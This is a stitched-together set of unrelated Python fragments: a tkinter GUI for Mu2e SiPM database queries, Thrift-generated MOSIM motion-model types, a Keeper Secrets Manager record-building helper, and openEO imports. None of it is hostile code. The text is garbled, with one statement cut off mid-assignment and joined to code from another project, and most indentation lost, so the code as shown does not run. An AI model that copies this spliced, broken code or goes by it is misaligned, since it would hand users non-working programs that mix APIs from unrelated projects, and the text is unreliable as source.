self.__myInstructions.setTextBoxWidth(50)
self.__myInstructions.makeWidgets()
self.__myInstructions.setText('','Instructions/InstructionsForSipmRootQuerry2017Jun28.txt')
self.__myInstructions.grid(row=self.__firstRow,column=self.__col,columnspan=2)
self.__firstRow += 1
##
self.__strName.append("Sipm PO")
self.__labelWidth = 15
self.__SipmBatchStr = myStringEntry(self,self.__firstRow,self.__col,self.__mySaveIt)
self.__SipmBatchStr.setEntryText(self.__strName[self.__sCount])
self.__SipmBatchStr.setLabelWidth(self.__labelWidth)
self.__SipmBatchStr.setEntryWidth(self.__entryWidth)
self.__SipmBatchStr.setButtonWidth(self.__buttonWidth)
self.__SipmBatchStr.makeEntry()
self.__SipmBatchStr.grid(row=self.__firstRow,column=self.__col,stick=W,columnspan=2)
self.__firstRow += 1
## Add list box to first columnspan
## This sequence presents a list box filled with the
## available batches. A left double click appends a
## another comma separated batch...
## Click the "Batches button" to load the list of batches
self.__tempBatchResults = []
self.__tempBatchResults = self.getSipmsBatchesFromDatabase()
if(self.__cmjPlotDiag != 0) : print(("self.__tempBatchResults = %s \n") % (self.__tempBatchResults))
self.__myOptions = []
for self.__m in self.__tempBatchResults:
self.__temp = self.__m.rsplit(",",8)
self.__myOptions.append(self.__temp[0])
self.__myScrolledList = ScrolledList(self,self.__myOptions)
self.__myScrolledList.grid(row=self.__firstRow,column=self.__col,sticky=W,rowspan=4)
## New Row
## Add button to get available batches...
## Enter the request for batches to be histogrammed.
## A single batch or a string of comma separated multiple batches
## may be selected for histogramming.
self.__col = 1
self.__secondRow = 2
self.__buttonWidth = 10
self.__getValues = Button(self,text='Batches',command=self.loadSipmBatchRequest,width=self.__buttonWidth,bg='lightblue',fg='black')
self.__getValues.grid(row=self.__secondRow,column=self.__col,sticky=W)
self.__secondRow += 1
## Plot scatter plots
self.__getValues = Button(self,text='Scatter Plots',command=self.getScatterPlots,width=self.__buttonWidth,bg='green',fg='black')
self.__getValues.grid(row=self.__secondRow,column=self.__col,sticky=W)
self.__secondRow += 1
## Plot histograms
self.__getValues = Button(self,text='Histograms',command=self.getHistograms,width=self.__buttonWidth,bg='green',fg='black')
self.__getValues.grid(row=self.__secondRow,column=self.__col,sticky=W)
self.__secondRow += 1
## Third Column...
self.__row = 0
self.__col = 2
self.__logo = mu2eLogo(self,self.__row,self.__col) # display Mu2e logo!
self.__logo.grid(row=self.__row,column=self.__col,rowspan=2,sticky=NE)
# Display the script's version number
self.__version = myLabel(self,self.__row,self.__col)
self.__version.setForgroundColor('blue')
self.__version.setFontAll('Arial',10,'bold')
self.__version.setWidth(20)
self.__version.setText(Version)
self.__version.makeLabel()
self.__version.grid(row=self.__row,column=self.__col,stick=E)
self.__row += 1
# Display the date the script is being run
self.__date = myDate(self,self.__row,self.__col,10) # make entry to row... pack right
self.__date.grid(row=self.__row,column=self.__col,sticky=E)
self.__col = 0
self.__row = 8
# Display the debug level selection
self.__col = 0
self.__buttonName = 'Debug Level (0 to 5)'
self.StringEntrySetup(self.__row,self.__col,self.__labelWidth,self.__entryWidth,self.__buttonWidth,self.__buttonName,self.__buttonName)
self.__row += 1
self.__buttonWidth = 10
##
## Add progress bar
#self.__progressbarStyle = Style()
#self.__progressbarStyle.configure("red.Horizontal.TProgressBar",background="red",forground="black")
#self.__progressbar = Progressbar(self.__frame0,orient=HORIZONTAL,length=200,maximum=300,variable=self.__progressBarCount,mode='determinate')
self.__row = 11
tempSipmRows = 10*self.countTheSimps()
self.__progressbarStyle = Style()
self.__progressbarStyle.theme_use('clam')
#self.__progressbarStyle.configure("green.Horizontal.TProgressbar",background="green")
#self.__progressbar = Progressbar(self,style="green.Horizontal.TProgressBar",orient=HORIZONTAL,length=500,maximum=tempSipmRows,variable=self.__progressBarCount,mode='determinate')
self.__progressBarMaximum = tempSipmRows
self.__progressbar = Progressbar(self,orient=HORIZONTAL,length=500,maximum=self.__progressBarMaximum,variable=self.__progressBarCount,mode='determinate')
self.__progressbar.grid(row=self.__row,column=0,columnspan=10,sticky=W)
## Add Control Bar at the bottom...
self.__col = 0
self.__firstRow = 10
self.__quitNow = Quitter(self,0,self.__col)
self.__quitNow.grid(row=self.__firstRow,column=0,sticky=W)
##
## -------------------------------------------------------------------
      ## Make queries to the database
def setupDevelopmentDatabase(self):
self.__database = 'mu2e_hardware_dev'
self.__group = "Sipm Tables"
self.__whichDatabase = 'development'
print("...multiWindow::getFromDevelopmentDatabase... get from development database \n")
self.__queryUrl = self.__database_config.getQueryUrl()
##
## -------------------------------------------------------------------
      ## Make queries to the database
def setupProductionDatabase(self):
self.__database = 'mu2e_hardware_prd'
self.__group = "Sipm Tables"
self.__whichDatabase = 'production'
print("...multiWindow::getFromProductionDatabase... get from production database \n")
self.__url = self.__database_config.getProductionQueryUrl()
##
#####################################################################################
##
## Setup local control: set debug level
##
##
## ===================================================================
## Local String Entry button
## Need to setup here to retain local program flow
def StringEntrySetup(self,row,col,totWidth=20,labelWidth=10,entryWidth=10,entryText='',buttonName='default',buttonText='Enter'):
print("----- StringEntrySetup--- Enter")
self.__StringEntry_row = row
self.__StringEntry_col = col
self.__StringEntry_labelWidth = 10
self.__StringEntry_entryWidth = 10
            self.__StringEntry_buttonWidth=
TType.LIST, 12)
oprot.writeListBegin(TType.STRUCT, len(self.Dependencies))
for iter112 in self.Dependencies:
iter112.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.Events is not None:
oprot.writeFieldBegin('Events', TType.LIST, 13)
oprot.writeListBegin(TType.STRING, len(self.Events))
for iter113 in self.Events:
oprot.writeString(iter113.encode('utf-8') if sys.version_info[0] == 2 else iter113)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.LongDescription is not None:
oprot.writeFieldBegin('LongDescription', TType.STRING, 14)
oprot.writeString(self.LongDescription.encode('utf-8') if sys.version_info[0] == 2 else self.LongDescription)
oprot.writeFieldEnd()
if self.ShortDescription is not None:
oprot.writeFieldBegin('ShortDescription', TType.STRING, 15)
oprot.writeString(self.ShortDescription.encode('utf-8') if sys.version_info[0] == 2 else self.ShortDescription)
oprot.writeFieldEnd()
if self.Parameters is not None:
oprot.writeFieldBegin('Parameters', TType.LIST, 16)
oprot.writeListBegin(TType.STRUCT, len(self.Parameters))
for iter114 in self.Parameters:
iter114.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.SceneParameters is not None:
oprot.writeFieldBegin('SceneParameters', TType.LIST, 17)
oprot.writeListBegin(TType.STRUCT, len(self.SceneParameters))
for iter115 in self.SceneParameters:
iter115.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.Vendor is not None:
oprot.writeFieldBegin('Vendor', TType.STRING, 18)
oprot.writeString(self.Vendor.encode('utf-8') if sys.version_info[0] == 2 else self.Vendor)
oprot.writeFieldEnd()
if self.VendorDomain is not None:
oprot.writeFieldBegin('VendorDomain', TType.STRING, 19)
oprot.writeString(self.VendorDomain.encode('utf-8') if sys.version_info[0] == 2 else self.VendorDomain)
oprot.writeFieldEnd()
if self.MmuUrl is not None:
oprot.writeFieldBegin('MmuUrl', TType.STRING, 20)
oprot.writeString(self.MmuUrl.encode('utf-8') if sys.version_info[0] == 2 else self.MmuUrl)
oprot.writeFieldEnd()
if self.UpdateUrl is not None:
oprot.writeFieldBegin('UpdateUrl', TType.STRING, 21)
oprot.writeString(self.UpdateUrl.encode('utf-8') if sys.version_info[0] == 2 else self.UpdateUrl)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.Name is None:
raise TProtocolException(message='Required field Name is unset!')
if self.ID is None:
raise TProtocolException(message='Required field ID is unset!')
if self.AssemblyName is None:
raise TProtocolException(message='Required field AssemblyName is unset!')
if self.MotionType is None:
raise TProtocolException(message='Required field MotionType is unset!')
if self.Language is None:
raise TProtocolException(message='Required field Language is unset!')
if self.Author is None:
raise TProtocolException(message='Required field Author is unset!')
if self.Version is None:
raise TProtocolException(message='Required field Version is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class MInstruction(object):
"""
Attributes:
- ID
- Name
- MotionType
- Properties
- Constraints
- StartCondition
- EndCondition
- Action
- Instructions
"""
def __init__(self, ID=None, Name=None, MotionType=None, Properties=None, Constraints=None, StartCondition=None, EndCondition=None, Action=None, Instructions=None,):
self.ID = ID
self.Name = Name
self.MotionType = MotionType
self.Properties = Properties
self.Constraints = Constraints
self.StartCondition = StartCondition
self.EndCondition = EndCondition
self.Action = Action
self.Instructions = Instructions
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.ID = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.Name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.MotionType = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.MAP:
self.Properties = {}
(_ktype117, _vtype118, _size116) = iprot.readMapBegin()
for _i120 in range(_size116):
_key121 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val122 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.Properties[_key121] = _val122
iprot.readMapEnd()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.LIST:
self.Constraints = []
(_etype126, _size123) = iprot.readListBegin()
for _i127 in range(_size123):
_elem128 = MOSIM.mmi.constraints.ttypes.MConstraint()
_elem128.read(iprot)
self.Constraints.append(_elem128)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.StartCondition = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRING:
self.EndCondition = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.STRING:
self.Action = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.LIST:
self.Instructions = []
(_etype132, _size129) = iprot.readListBegin()
for _i133 in range(_size129):
_elem134 = MInstruction()
_elem134.read(iprot)
self.Instructions.append(_elem134)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('MInstruction')
if self.ID is not None:
oprot.writeFieldBegin('ID', TType.STRING, 1)
oprot.writeString(self.ID.encode('utf-8') if sys.version_info[0] == 2 else self.ID)
oprot.writeFieldEnd()
if self.Name is not None:
oprot.writeFieldBegin('Name', TType.STRING, 2)
oprot.writeString(self.Name.encode('utf-8') if sys.version_info[0] == 2 else self.Name)
oprot.writeFieldEnd()
if self.MotionType is not None:
oprot.writeFieldBegin('MotionType', TType.STRING, 3)
oprot.writeString(self.MotionType.encode('utf-8') if sys.version_info[0] == 2 else self.MotionType)
oprot.writeFieldEnd()
if self.Properties is not None:
oprot.writeFieldBegin('Properties', TType.MAP, 4)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.Properties))
for kiter135, viter136 in self.Properties.items():
oprot.writeString(kiter135.encode('utf-8') if sys.version_info[0] == 2 else kiter135)
oprot.writeString(viter136.encode('utf-8') if sys.version_info[0] == 2 else viter136)
oprot.writeMapEnd()
oprot.writeFieldEnd()
if self.Constraints is not None:
oprot.writeFieldBegin('Constraints', TType.LIST, 5)
oprot.writeListBegin(TType.STRUCT, len(self.Constraints))
for iter137 in self.Constraints:
iter137.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.StartCondition is not None:
oprot.writeFieldBegin('StartCondition', TType.STRING, 6)
oprot.writeString(self.StartCondition.encode('utf-8') if sys.version_info[0] == 2 else self.StartCondition)
oprot.writeFieldEnd()
if self.EndCondition is not None:
oprot.writeFieldBegin('EndCondition', TType.STRING, 7)
oprot.writeString(self.EndCondition.encode('utf-8') if sys.version_info[0] == 2 else self.EndCondition)
oprot.writeFieldEnd()
if self.Action is not None:
oprot.writeFieldBegin('Action', TType.STRING, 8)
oprot.writeString(self.Action.encode('utf-8') if sys.version_info[0] == 2 else self.Action)
oprot.writeFieldEnd()
if self.Instructions is not None:
oprot.writeFieldBegin('Instructions', TType.LIST, 9)
oprot.writeListBegin(TType.STRUCT, len(self.Instructions))
for iter138 in self.Instructions:
iter138.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.ID is None:
raise TProtocolException(message='Required field ID is unset!')
if self.Name is None:
raise TProtocolException(message='Required field Name is unset!')
if self.MotionType is None:
raise TProtocolException(message='Required field MotionType is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(MSimulationState)
MSimulationState.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'Initial', [MOSIM.mmi.avatar.ttypes.MAvatarPostureValues, None], None, ), # 1
(2, TType.STRUCT, 'Current', [MOSIM.mmi.avatar.ttypes.MAvatarPostureValues, None], None, ), # 2
(3, TType.LIST, 'Constraints', (TType.STRUCT, [MOSIM.mmi.constraints.ttypes.MConstraint, None], False), None, ), # 3
(4, TType.LIST, 'SceneManipulations', (TType.STRUCT, [MOSIM.mmi.scene.ttypes.MSceneManipulation, None], False), None, ), # 4
(5, TType.LIST, 'Events', (TType.STRUCT, [MSimulationEvent, None], False), None, ), # 5
)
all_structs.append(MSimulationResult)
MSimulationResult.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'Posture', [MOSIM.mmi.avatar.ttypes.MAvatarPostureValues, None], None, ), # 1
(2, TType.LIST, 'Constraints', (TType.STRUCT, [MOSIM.mmi.constraints.ttypes.MConstraint, None], False), None, ), # 2
(3, TType.LIST, 'Events', (TType.STRUCT, [MSimulationEvent, None], False), None, ), # 3
(4, TType.LIST, 'SceneManipulations', (TType.STRUCT, [MOSIM.mmi.scene.ttypes.MSceneManipulation, None], False), None, ), # 4
(5, TType.LIST, 'DrawingCalls', (TType.STRUCT, [MOSIM.mmi.scene.ttypes.MDrawingCall, None], False), None, ), # 5
(6, TType.LIST, 'LogData', (TType.STRING, 'UTF8', False), None, ), # 6
)
all_structs.append(MSimulationEvent)
MSimulationEvent.thrift_spec = (
None, # 0
(1, TType.STRING, 'Name', 'UTF8', None, ), # 1
(2, TType.STRING, 'Type', 'UTF8', None, ), # 2
(3, TType.STRING, 'Reference', 'UTF8', None, ), # 3
(4, TType.MAP, 'Properties', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 4
)
all_structs.append(MVersion)
MVersion.thrift_spec = (
None, # 0
(1, TType.I16, 'Major', None, None, ), # 1
(2, TType.I16, 'Minor', None, None, ), # 2
(3, TType.I16, 'Sub', None, None, ), # 3
(4, TType.I16, 'Subsub', None, None, ), # 4
)
all_structs.append(MDependency)
MDependency.thrift_spec = (
None, # 0
(1, TType.STRING, 'ID', 'UTF8', None, ), # 1
(2, TType.I32, 'Type', None, None, ), # 2
(3, TType.STRUCT, 'MinVersion', [MVersion, None], None, ), # 3
(4, TType.STRUCT, 'MaxVersion', [MVersion, None], None, ), # 4
(5, TType.LIST, 'ExcludedVersions', (TType.STRUCT, [MVersion, None], False), None, ), # 5
(6, TType.STRING, 'Name', 'UTF8', None, ), # 6
)
all_structs.append(MMUDescription)
MMUDescription.thrift_spec = (
None, # 0
(1, TType.STRING, 'Name', 'UTF8', None, ), # 1
(2, TType.STRING, 'ID', 'UTF8', None, ), # 2
(3, TType.STRING, 'AssemblyName', 'UTF8', None, ), # 3
(4, TType.STRING, 'MotionType', 'UTF8', None, ), # 4
None, # 5
(6, TType.STRING, 'Language', 'UTF8', None, ), # 6
(7, TType.STRING, 'Author', 'UTF8', None, ), # 7
(8, TType.STRING, 'Version', 'UTF8', None, ), # 8
(9, TType.LIST, 'Prerequisites', (TType.STRUCT, [MOSIM.mmi.constraints.ttypes.MConstraint, None], False), None, ), # 9
None, # 10
(11, TType.MAP, 'Properties', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 11
(12, TType.LIST, 'Dependencies', (TType.STRUCT, [MDependency, None], False), None, ), # 12
(13, TType.LIST, 'Events', (TType.STRING, 'UTF8', False), None, ), # 13
(14, TType.STRING, 'LongDescription', 'UTF8', None, ), # 14
(15, TType.STRING, 'ShortDescription', 'UTF8', None, ), # 15
(16, TType.LIST, 'Parameters', (TType.STRUCT, [MOSIM.mmi.core.ttypes.MParameter, None], False), None, ), # 16
(17, TType.LIST, 'SceneParameters', (TType.STRUCT, [MOSIM.mmi.core.ttypes.MParameter, None], False), None, ), # 17
(18, TType.STRING, 'Vendor', 'UTF8', None, ), # 18
(19, TType.STRING, 'VendorDomain', 'UTF8', None, ), # 19
(20, TType.STRING, 'MmuUrl', 'UTF8', None, ), # 20
(21, TType.STRING, 'UpdateUrl', 'UTF8', None, ), # 21
)
all_structs.append(MInstruction)
MInstruction.thrift_spec = (
    None, # 0
    (1, TType.STRING, 'ID', 'UTF8', None, ), # 1
    (2, TType.STRING, 'Name', 'UTF8', None, ), # 2
    (3, TType.STRING, 'MotionType', 'UTF8', None, ), # 3
    (4, TType.MAP, 'Properties', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 4
    (5, TType.LIST, 'Constraints', (TType.STRUCT, [MOSIM.mmi.constraints.ttypes.MConstraint, None], False), None, ), # 5
    (6, TType.STRING, 'StartCondition', 'UTF8', None, ), # 6
    (7, TType.STRING, 'EndCondition', 'UTF8', None, ), # 7
    (8, TType.STRING, 'Action', 'UTF8', None, ), # 8
    (9, TType.LIST, 'Instructions', (TType.STRUCT, [MInstruction, None], False), None, ), # 9
)
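# --- Illustrative sketch (not part of the generated Thrift code) ---
# A minimal example of building and validating an MInstruction; all field
# values below are hypothetical placeholders, not values from the MOSIM spec.
def _example_build_instruction():
    instruction = MInstruction(
        ID="instruction-1",  # hypothetical identifier
        Name="ReachForObject",  # hypothetical name
        MotionType="Object/Reach",  # hypothetical motion type
        Properties={"TargetID": "object-1"},  # hypothetical property map
    )
    # validate() raises TProtocolException if ID, Name or MotionType is unset.
    instruction.validate()
    return instruction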
from keeper_secrets_manager_helper.field import Field, FieldSectionEnum
from keeper_secrets_manager_helper.common import load_file
from keeper_secrets_manager_helper.v3.record_type import get_class_by_type as get_record_type_class
from keeper_secrets_manager_helper.v3.field_type import get_class_by_type as get_field_type_class
from importlib import import_module
class Record:
@staticmethod
def create_from_file(file, password_generate=False):
record_data = load_file(file)
return Record.create_from_data(record_data, password_generate=password_generate)
@staticmethod
def create_from_data(record_data, password_generate=False):
records = []
if record_data.get("version") != "v3":
raise ValueError(".version is not 'v3'")
if record_data.get("kind") != "KeeperRecord":
raise ValueError(".kind is not 'KeeperRecord'")
data = record_data.get("data")
if data is None:
raise ValueError(".data[] is missing")
if isinstance(data, list) is False:
raise ValueError(".data[] is not an array")
record_count = 0
for record_item in data:
record_type = record_item.get("recordType", record_item.get("record_type"))
if record_type is None or record_type == "":
raise ValueError(f".data[{record_count}].recordType is missing or blank")
title = record_item.get("title")
if title is None or title == "":
raise ValueError(f".data[{record_count}].title is missing or blank")
record = Record(
record_type=record_type,
title=title,
notes=record_item.get("notes"),
password_generate=password_generate
)
all_fields = []
fields = record_item.get("fields")
if fields is None:
raise ValueError(f".data[{record_count}].fields[] is missing")
if isinstance(fields, list) is False:
raise ValueError(f".data[{record_count}].fields[] is not an array")
for field_item in fields:
field = Field(
type=field_item.get("type"),
field_section=FieldSectionEnum.STANDARD,
label=field_item.get("label"),
value=field_item.get("value"),
)
all_fields.append(field)
custom_fields = record_item.get("customFields", record_item.get("custom_fields"))
if custom_fields is not None:
if isinstance(custom_fields, list) is False:
raise ValueError(f".data[{record_count}].fields[] is not an array")
for field_item in custom_fields:
field = Field(
type=field_item.get("type"),
field_section=FieldSectionEnum.CUSTOM,
label=field_item.get("label"),
value=field_item.get("value"),
)
all_fields.append(field)
record.add_fields(all_fields)
record.build_record()
            records.append(record)
            record_count += 1
return records
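    # Illustrative sketch of the dictionary shape that create_from_data expects.
    # The "login" record type and the field values below are hypothetical examples;
    # only the keys mirror what the parsing code above reads:
    #
    #   {
    #       "version": "v3",
    #       "kind": "KeeperRecord",
    #       "data": [
    #           {
    #               "recordType": "login",
    #               "title": "My Login",
    #               "notes": "optional notes",
    #               "fields": [
    #                   {"type": "login", "value": "user@example.com"},
    #                   {"type": "password", "value": "secret"}
    #               ],
    #               "customFields": [
    #                   {"type": "text", "label": "My Label", "value": "hello"}
    #               ]
    #           }
    #       ]
    #   }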
def __init__(self, *args, **kwargs):
# If there is an arg, then assume it's a dictionary with record data.
if len(args) > 0:
pass
self.record_type = kwargs.get("record_type")
self.title = kwargs.get("title")
self.notes = kwargs.get("notes")
self.fields = []
self.custom_fields = []
if self.record_type is None or self.record_type == "":
raise ValueError("record_type is missing or blank.")
try:
record_type = get_record_type_class(self.record_type)()
# Make a quick lookup for the standard fields.
self._valid_fields = [{"type": x.get("type"), "label": x.get("label"), "has_value": False}
for x in record_type.get_standard_fields()]
except ImportError as err:
raise ValueError(err)
if self.title is None or self.title == "":
raise ValueError("title is missing or blank.")
# The fields are mapped here in an attempt to make unique fields.
self._fields = {
FieldSectionEnum.STANDARD: {},
FieldSectionEnum.CUSTOM: {}
}
self.password_generate = kwargs.get("password_generate", False)
self.password_complexity = kwargs.get("password_complexity", None)
self.valid_fields = []
# All the fields (standard/custom) to be passed in with the constructor.
fields = kwargs.get("fields")
if fields is not None:
self.add_fields(fields)
self.build_record()
def _add_new_field(self, field, field_key, group_key):
        # Count the number of keys in the dictionary and use that for an index. That will be used to determine
# the order.
field.index = len(self._fields[field.field_section])
# If the group key is not None, then convert the value to an array.
if group_key is not None and isinstance(field.value, list) is False:
field.value = [field.value]
self._fields[field.field_section][field_key] = field
def _is_valid_standard_field(self, field_type):
for item in self._valid_fields:
if item.get("type") == field_type and item.get("has_value") is False:
return True
return False
def _flag_standard_field_used(self, field_type):
for item in self._valid_fields:
if item.get("type") == field_type and item.get("has_value") is False:
item["has_value"] = True
break
def _get_label_for_standard_field(self, field_type):
for item in self._valid_fields:
if item.get("type") == field_type and item.get("has_value") is False:
return item.get("label")
return None
def add_fields(self, fields):
if isinstance(fields, list) is False:
fields = [fields]
for field in fields:
if isinstance(field, Field) is False:
raise ValueError("The method add_field requires instance(s) of Field")
#
label = None
if field.field_section == FieldSectionEnum.STANDARD:
label = self._get_label_for_standard_field(field.type)
field_key = field.instance_field_key(label=label)
group_key = field.group_key
# Does this key already exists? And can we add values to the dictionary value?
if field_key in self._fields[field.field_section] and field.can_add_key_value():
                # If our value is a string we should not be in here.
if isinstance(field.value, str) is True:
raise ValueError(f"The {field.type} is a string. If JSON check to see if JSON is valid.")
                # Get the existing field and copy any values in its dictionary into the existing field.
existing_field = self._fields[field.field_section][field_key]
# If the field is completely set
if existing_field.is_complete is True and existing_field.field_section == FieldSectionEnum.STANDARD:
raise ValueError("Attempting to set a standard field that has already been set.")
                # The existing field is complete and a custom field, so it can only be added if it is unique.
if existing_field.is_complete is True:
raise ValueError("Cannot add this field due to it not being unique. To make unique add a label to "
"the field or make sure the label is not being duplicated.")
# If the existing_field is JSON and the current field is JSON, then add to existing. This allows
# the value to be set with multiple objects.
if existing_field.initial_value_was_json and field.initial_value_was_json:
if isinstance(existing_field.value, dict) is True:
existing_field.value = [existing_field.value]
if isinstance(field.value, list) is True:
for item in field.value:
existing_field.value.append(item)
else:
existing_field.value.append(field.value)
continue
for k, v in field.value.items():
                    # If the group key is set, the value can be multiple dictionaries that have a specific key
                    # which indicates their uniqueness. If that key does not exist, values can be inserted into the
                    # last dictionary in the list. If it does exist, then a new dictionary is created.
if group_key is not None:
found_a_place = False
for item in existing_field.value:
if group_key not in item and item.get(Field.complete_key) is not True:
item[k] = v
found_a_place = True
else:
item[Field.complete_key] = True
if found_a_place is False and isinstance(existing_field.value, list) is True:
new_object = {k: v}
existing_field.value.append(new_object)
elif isinstance(existing_field.value, dict) is True:
existing_field.value[k] = v
# Else we are creating a new entry.
else:
# Standard fields are defined. Don't insert a field that doesn't belong.
if field.field_section == FieldSectionEnum.STANDARD:
if self._is_valid_standard_field(field.type):
self._flag_standard_field_used(field.type)
else:
raise ValueError(f"The standard fields do not have a '{field.type}' "
"field type or they all have values.")
self._add_new_field(field, field_key, group_key)
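    # Illustrative sketch of adding fields programmatically (the "login" record
    # type and values are hypothetical; Field and FieldSectionEnum come from
    # keeper_secrets_manager_helper.field, imported at the top of this module):
    #
    #   record = Record(record_type="login", title="Example", password_generate=True)
    #   record.add_fields([
    #       Field(type="login", field_section=FieldSectionEnum.STANDARD, value="user@example.com"),
    #       Field(type="text", field_section=FieldSectionEnum.CUSTOM, label="Note", value="hello"),
    #   ])
    #   record.build_record()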
@staticmethod
def _copy_record_type_settings(field_obj, standard_field):
# Copy extra values from the record type schema to the field. These are unique field type params like
# required, enforce_generation and complexity.
for key, value in standard_field.items():
field_obj.add_extra(key, value)
def _get_standard_fields(self, record_type):
# Add the standard fields in the order defined by record type schema.
fields_list = []
# Get a list of standard fields in the Record Type.
for standard_field in record_type.get_standard_fields():
            # First check if we have a key with a label; if it exists, use that.
field_key = Field.field_key(standard_field.get("type"), standard_field.get("label"))
if field_key in self._fields[FieldSectionEnum.STANDARD]:
field_obj = self._fields[FieldSectionEnum.STANDARD][field_key]
self._copy_record_type_settings(field_obj, standard_field)
fields_list.append(field_obj)
else:
                # Find the field by its field type.
field_key = Field.field_key(standard_field.get("type"), None)
if field_key in self._fields[FieldSectionEnum.STANDARD]:
field_obj = self._fields[FieldSectionEnum.STANDARD][field_key]
self._copy_record_type_settings(field_obj, standard_field)
fields_list.append(field_obj)
else:
# If nothing exists, make an empty field for the field type
field_obj = Field(
type=standard_field.get("type"),
field_section=FieldSectionEnum.STANDARD,
value=None
)
self._copy_record_type_settings(field_obj, standard_field)
fields_list.append(field_obj)
return fields_list
def _get_custom_fields(self):
def get_index_key(obj):
return obj.index
# Add the custom fields in the order they were added.
fields_list = [self._fields[FieldSectionEnum.CUSTOM][x] for x in self._fields[FieldSectionEnum.CUSTOM]]
fields_list.sort(key=get_index_key)
return fields_list
@staticmethod
def _remove_private_keys(obj):
"""
        The value might contain dictionaries that contain private keys. This will remove any that exist. Right
        now it's just one.
"""
if isinstance(obj, list):
for item in obj:
Record._remove_private_keys(item)
elif isinstance(obj, dict):
obj.pop(Field.complete_key, None)
def build_record(self):
record_type = get_record_type_class(self.record_type)()
# Take all the standard fields from the user's input and populate the field type to validate it. Then
        # append the dictionary used in the V3 records for a field to the list.
self.fields = []
for field in self._get_standard_fields(record_type):
field_type_kwargs = field.to_dict()
self._remove_private_keys(field_type_kwargs.get("value"))
field_type_kwargs["password_generate"] = self.password_generate
if self.password_complexity is not None:
field_type_kwargs["complexity"] = self.password_complexity
field_type_obj = get_field_type_class(field.type)(**field_type_kwargs)
self.fields.append(field_type_obj.to_dict())
# Do the same with the custom fields.
self.custom_fields = []
for field in self._get_custom_fields():
field_type_kwargs = field.to_dict()
self._remove_private_keys(field_type_kwargs.get("value"))
field_type_kwargs["password_generate"] = self.password_generate
if self.password_complexity is not None:
field_type_kwargs["complexity"] = self.password_complexity
field_type_obj = get_field_type_class(field.type)(**field_type_kwargs)
self.custom_fields.append(field_type_obj.to_dict())
def get_record_create_obj(self):
try:
# Make sure the classes we need are in the KSM Python SDK.
mod = import_module("keeper_secrets_manager_core.dto.dtos")
if hasattr(mod, "RecordCreate") is False:
raise ImportError("Cannot find the RecordCreate in the KSM Python SDK. Please update the SDK.")
record_field_class = getattr(mod, "RecordField")
if record_field_class is None:
raise ImportError("Cannot find the RecordField in the KSM Python SDK. Please update the SDK.")
# Make an instance of the SDK's RecordCreate
new_record = getattr(mod, "RecordCreate")(
record_type=self.record_type,
title=self.title
)
# Add the standard fields thru RecordField constructor
record_field = []
for field in self.fields:
                # Translate the field dictionary into a RecordField instance.
import copy
import datetime
import logging
import pathlib
import typing
from typing import List, Dict, Union, Tuple
from shapely.geometry import Polygon, MultiPolygon, mapping
from openeo.imagecollection import ImageCollection
from openeo.internal.graphbuilder_040 import GraphBuilder
from openeo.metadata import CollectionMetadata
from openeo.rest import BandMathException
from openeo.rest.job import RESTJob
from openeo.rest.service import Service
from openeo.util import get_temporal_extent, legacy_alias, dict_no_none, guess_format
if hasattr(typing, 'TYPE_CHECKING') and typing.TYPE_CHECKING:
# Imports for type checking only (circular import issue at runtime). `hasattr` is Python 3.5 workaround #210
from openeo.rest.connection import Connection
_log = logging.getLogger(__name__)
class ImageCollectionClient(ImageCollection):
"""Class representing an Image Collection. (In the API as 'imagery')
Supports 0.4.
